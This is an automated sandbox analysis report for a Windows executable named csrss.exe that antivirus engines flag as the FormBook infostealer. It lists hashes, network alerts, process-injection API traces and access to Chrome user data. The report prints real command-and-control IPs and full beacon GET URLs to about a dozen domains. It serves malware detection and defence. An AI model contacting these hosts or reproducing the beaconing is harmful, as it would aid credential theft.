popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

csrss.exe

Malicious Library UPX OS Processor Check PE32 PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Dec. 10, 2022, 2:44 p.m. Dec. 10, 2022, 2:47 p.m.
Size 332.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 0a3a7cba003467f2d1976ba842d155dc
SHA256 856e9dc2812c572a9023f02503c471addbf8a82be5aed8454cc6254f899caccb
CRC32 7AF935BC
ssdeep 6144:9kwvbmtv3a9uj5joIvbmcZwd4535p3pkRC9XrtDgwLKTqSVN3DhMggWnC:7qtPaQNjjZc453Lp0KXpfLK+SVN3tHLC
Yara
  • IsPE32 - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • UPX_Zero - UPX packed file

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49182 -> 66.29.151.40:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49182 -> 66.29.151.40:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 155.159.61.221:80 -> 192.168.56.101:49177 2400012 ET DROP Spamhaus DROP Listed Traffic Inbound group 13 Misc Attack
TCP 192.168.56.101:49182 -> 66.29.151.40:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 155.159.61.221:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 2.57.90.16:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 155.159.61.221:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 2.57.90.16:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 155.159.61.221:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 2.57.90.16:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 192.185.35.86:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 192.185.35.86:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 192.185.35.86:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 2.57.90.16:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 195.24.68.23:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 195.24.68.23:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 195.24.68.23:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 2.57.90.16:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 2.57.90.16:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 192.185.217.47:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 162.214.129.149:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 192.185.217.47:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 162.214.129.149:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 192.185.217.47:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 162.214.129.149:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 206.233.197.135:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 206.233.197.135:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 206.233.197.135:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49185 -> 66.29.141.188:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49185 -> 66.29.141.188:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49185 -> 66.29.141.188:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49180 -> 154.22.100.62:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49180 -> 154.22.100.62:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49180 -> 154.22.100.62:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 162.0.238.93:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 162.0.238.93:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 162.0.238.93:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.eufidelizo.com/henz/?nbWl8n=wcp3urA+/rGtUuNVdzf16ZeZGpZq4XGXlvUWG7FdGjeYGPzd5j/gkjEzvi43j/MvxviINYayZJCRqWKQvjoVWw+U5Y7ODGkonKNL7W0=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.lyonfinancialusa.com/henz/?nbWl8n=I97X75yj3reE70KD0H/Cak1oo2zHy9G/KKFZ2xPoakAfOE75REIsiEdUspxqeb3/DlFpoh36cAjqvl85DwXllB7WLme1uHpNnCumkME=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.afterdarksocial.club/henz/?nbWl8n=8TptbrIX6F4NxrWdTnVKCiNdtmXGEuELv5cUeaX5N5UPFd9Hxy/eCwrx8CSqMIuqYtp16J6ah9tFi3/97BblSlVnUMukTQJmI59ItyY=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.patrickguarte.com/henz/?nbWl8n=5p9Ov6C7qce51hIp6nkbqV/d59cDddN77lLEFw6Ufibk2yN56suGmW9SnR2oT5DaW1POG/xMOeVc/Muqlx89dGklgcJInIpBk29/OFI=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.brennancorps.info/henz/?nbWl8n=P4ST2IJPckjMYpRf2hTG7XGyBDGAy7OOggEf6mHPhnME1yGBMW0exDItYRA37f+XnLyPH15dACF6dKWBGe8FrnsbvwR+k5hXy5NlDxw=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.lopezmodeling.com/henz/?nbWl8n=dpH6BKfQQ0cm5ImeofuKRskABJrBNfLp0vSyI4bn1RZjePkdeS9a/FiQgEdxlvmzsB0l+sQcpRgj8HqvSEXtkBUtM/7b2ek1qpGMuFI=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.foxwhistle.com/henz/?nbWl8n=jIhXpQA4pSG2yYWBbTjo4KjMDsvsQ9F5uiLrR0YNz1ez7r/FQUV2XPmUrykxRWDvkt62w03aCUUodajM6m+91s+tfqSr6z5AiriQQhU=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.phootka.ru/henz/?nbWl8n=w1bwPjtuf2ZlKfJJwO+BTMATo3IZhxYr0xwxA7aVeAjkl5kFf+SBsbPh/8ORAg46rPRxP2SAJydpY5hX47JJGDyZCrebhSML6UzwAv0=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.courdak.info/henz/?nbWl8n=vdyVzLcxoZUoogW6+NKMfwQ5LAGTMZCWuq0zGM5B+O39UoDsvg/hobD3JDgVlVzjVFZes90R2RhtZev/AI+f5OQ7oLMklDSyOnM4EYU=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.automotiveparts-store.com/henz/?nbWl8n=l755dn3SV1HJ85bgdYLXX0FitE0O++oBuxO/p/rOD3cyNdqLfUPJLAMkl1O9xhY/fGSw1luYDYlS6H/677nep41+QBgryFqg6K8ooWg=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.seufi.com/henz/?nbWl8n=IBGzHMg16oJNSPrzw250+MvRfpuZJ+UNeLGkgBGOsROhXn3QAnT7j8xX9Jlog+RFk3dGiXHpM08k153fm/VBkqw4m0Htf2ZTok+naIQ=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.youandmegb136.shop/henz/?nbWl8n=UtZym1qImX06+GpDcpN9/2+kdchdxBnkrVUZumUi1jx9tPAiXeTjhhssvsimU8yI7A/xS1pJIIlTb23usgwKY3ermdd4E2Ie0oOK+14=&D8cH=NdndsZxX
request GET http://www.eufidelizo.com/henz/?nbWl8n=wcp3urA+/rGtUuNVdzf16ZeZGpZq4XGXlvUWG7FdGjeYGPzd5j/gkjEzvi43j/MvxviINYayZJCRqWKQvjoVWw+U5Y7ODGkonKNL7W0=&D8cH=NdndsZxX
request GET http://www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
request GET http://www.sqlite.org/2022/sqlite-dll-win32-x86-3370000.zip
request GET http://www.sqlite.org/2017/sqlite-dll-win32-x86-3160000.zip
request GET http://www.sqlite.org/2020/sqlite-dll-win32-x86-3320000.zip
request GET http://www.sqlite.org/2020/sqlite-dll-win32-x86-3330000.zip
request GET http://www.lyonfinancialusa.com/henz/?nbWl8n=I97X75yj3reE70KD0H/Cak1oo2zHy9G/KKFZ2xPoakAfOE75REIsiEdUspxqeb3/DlFpoh36cAjqvl85DwXllB7WLme1uHpNnCumkME=&D8cH=NdndsZxX
request GET http://www.afterdarksocial.club/henz/?nbWl8n=8TptbrIX6F4NxrWdTnVKCiNdtmXGEuELv5cUeaX5N5UPFd9Hxy/eCwrx8CSqMIuqYtp16J6ah9tFi3/97BblSlVnUMukTQJmI59ItyY=&D8cH=NdndsZxX
request GET http://www.patrickguarte.com/henz/?nbWl8n=5p9Ov6C7qce51hIp6nkbqV/d59cDddN77lLEFw6Ufibk2yN56suGmW9SnR2oT5DaW1POG/xMOeVc/Muqlx89dGklgcJInIpBk29/OFI=&D8cH=NdndsZxX
request GET http://www.brennancorps.info/henz/?nbWl8n=P4ST2IJPckjMYpRf2hTG7XGyBDGAy7OOggEf6mHPhnME1yGBMW0exDItYRA37f+XnLyPH15dACF6dKWBGe8FrnsbvwR+k5hXy5NlDxw=&D8cH=NdndsZxX
request GET http://www.lopezmodeling.com/henz/?nbWl8n=dpH6BKfQQ0cm5ImeofuKRskABJrBNfLp0vSyI4bn1RZjePkdeS9a/FiQgEdxlvmzsB0l+sQcpRgj8HqvSEXtkBUtM/7b2ek1qpGMuFI=&D8cH=NdndsZxX
request GET http://www.foxwhistle.com/henz/?nbWl8n=jIhXpQA4pSG2yYWBbTjo4KjMDsvsQ9F5uiLrR0YNz1ez7r/FQUV2XPmUrykxRWDvkt62w03aCUUodajM6m+91s+tfqSr6z5AiriQQhU=&D8cH=NdndsZxX
request GET http://www.phootka.ru/henz/?nbWl8n=w1bwPjtuf2ZlKfJJwO+BTMATo3IZhxYr0xwxA7aVeAjkl5kFf+SBsbPh/8ORAg46rPRxP2SAJydpY5hX47JJGDyZCrebhSML6UzwAv0=&D8cH=NdndsZxX
request GET http://www.courdak.info/henz/?nbWl8n=vdyVzLcxoZUoogW6+NKMfwQ5LAGTMZCWuq0zGM5B+O39UoDsvg/hobD3JDgVlVzjVFZes90R2RhtZev/AI+f5OQ7oLMklDSyOnM4EYU=&D8cH=NdndsZxX
request GET http://www.automotiveparts-store.com/henz/?nbWl8n=l755dn3SV1HJ85bgdYLXX0FitE0O++oBuxO/p/rOD3cyNdqLfUPJLAMkl1O9xhY/fGSw1luYDYlS6H/677nep41+QBgryFqg6K8ooWg=&D8cH=NdndsZxX
request GET http://www.seufi.com/henz/?nbWl8n=IBGzHMg16oJNSPrzw250+MvRfpuZJ+UNeLGkgBGOsROhXn3QAnT7j8xX9Jlog+RFk3dGiXHpM08k153fm/VBkqw4m0Htf2ZTok+naIQ=&D8cH=NdndsZxX
request GET http://www.youandmegb136.shop/henz/?nbWl8n=UtZym1qImX06+GpDcpN9/2+kdchdxBnkrVUZumUi1jx9tPAiXeTjhhssvsimU8yI7A/xS1pJIIlTb23usgwKY3ermdd4E2Ie0oOK+14=&D8cH=NdndsZxX
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2644
region_size: 4001792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2644
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 188416
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00401000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2688
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00950000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2852
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02080000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\
file C:\Users\test22\AppData\Local\Temp\fyjekd.exe
file C:\Users\test22\AppData\Local\Temp\fyjekd.exe
file C:\Users\test22\AppData\Local\Temp\fyjekd.exe
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Process injection Process 2644 called NtSetContextThread to modify thread in remote process 2688
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 1638384
registers.edi: 0
registers.eax: 4199088
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000c8
process_identifier: 2688
1 0 0
MicroWorld-eScan Gen:Variant.Jaik.77520
Cybereason malicious.c584a2
Cyren W32/Trojan.AIIW-8367
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
APEX Malicious
Kaspersky VHO:Trojan.Win32.FormBook.gen
BitDefender Gen:Variant.Jaik.77520
Avast Win32:Evo-gen [Trj]
Ad-Aware Gen:Variant.Jaik.77520
Emsisoft Gen:Variant.Jaik.77520 (B)
VIPRE Gen:Variant.Jaik.77520
FireEye Gen:Variant.Jaik.77520
GData Gen:Variant.Jaik.77520
Google Detected
MAX malware (ai score=81)
Antiy-AVL Trojan/NSIS.Formbook.a
Arcabit Trojan.Jaik.D12ED0
Microsoft Trojan:Win32/Formbook.AT!MTB
Cynet Malicious (score: 100)
BitDefenderTheta Gen:NN.ZexaF.36106.rqW@aqeHIX
ALYac Gen:Variant.Jaik.77520
Malwarebytes Malware.AI.4239435998
Rising Trojan.Injector!8.C4 (TFE:1:Gm8DD6ShD4R)
Ikarus Trojan.NSIS.Agent
Fortinet W32/Injector.ESIU!tr
AVG Win32:Evo-gen [Trj]
CrowdStrike win/malicious_confidence_90% (D)